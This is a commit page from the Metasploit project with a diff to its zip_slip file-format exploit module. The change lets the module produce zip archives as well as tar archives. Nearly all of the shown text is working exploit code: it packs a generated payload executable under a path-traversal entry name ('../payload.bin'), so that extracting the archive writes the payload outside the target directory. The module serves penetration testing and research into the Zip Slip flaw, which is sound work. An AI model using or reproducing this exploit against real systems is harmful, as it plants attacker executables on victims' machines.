Add support for zip generation in zip_slip exploit

rapid7 · Aug 31, 2020 · 7882441 · 7882441
1 parent 760aba0
commit 7882441
Showing 1 changed file with 27 additions and 15 deletions.
diff --git a/modules/exploits/multi/fileformat/zip_slip.rb b/modules/exploits/multi/fileformat/zip_slip.rb
@@ -27,7 +27,8 @@ def initialize(info={})
       'Author'         =>
         [
           'Snyk',  # Technique discovery
-          'sinn3r' # Metasploit
+          'sinn3r', # Metasploit
+          'ggkitsas'
         ],
       'References'     =>
         [
@@ -48,7 +49,8 @@ def initialize(info={})
     ))
 
     register_options([
-      OptString.new('FILENAME', [true, 'The tar file (tar)', 'msf.tar']),
+      OptString.new('FNAME', [true, 'The name of the archive file (without extension)', 'msf']),
+      OptEnum.new('FTYPE', [true, 'The archive type', 'tar', ['tar', 'zip'] ]),
       OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])
     ])
   end
@@ -57,32 +59,41 @@ class ZipSlipArchive
     attr_reader :data
     attr_reader :fname
     attr_reader :payload
+    attr_reader :type
 
-    def initialize(n, p)
+    def initialize(n, p, t)
       @fname = n
       @payload = p
+      @type = t
       @data = make
     end
 
     def make
       data = ''
       path = Rex::FileUtils.normalize_unix_path(fname)
-      tar = StringIO.new
-      Rex::Tar::Writer.new(tar) do |t|
-        t.add_file(path, 0777) do |f|
-          f.write(payload)
+
+      if type == 'tar'
+        contents = StringIO.new
+        Rex::Tar::Writer.new(contents) do |t|
+          t.add_file(path, 0777) do |f|
+            f.write(payload)
+          end
         end
+        contents.seek(0)
+        data = contents.read
+        contents.close
+        data
+      elsif type == 'zip'
+        zip = Rex::Zip::Archive.new
+        zip.add_file(path, payload)
+        data = zip.pack
       end
-      tar.seek(0)
-      data = tar.read
-      tar.close
-      data
     end
   end
 
-  def make_tar(target_payload_path)
+  def make_archive(target_payload_path, type)
     elf = generate_payload_exe(code: payload.encoded)
-    archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe)
+    archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe, type)
     archive.make
   end
 
@@ -93,8 +104,9 @@ def exploit
       return
     end
 
-    tar = make_tar(target_payload_path)
-    file_create(tar)
+    archive = make_archive(target_payload_path, datastore['FTYPE'])
+    datastore['FILENAME'] = datastore['FNAME'] + '.' + datastore['FTYPE']
+    file_create(archive)
     print_status('When extracted, the payload is expected to extract to:')
     print_status(target_payload_path)
   end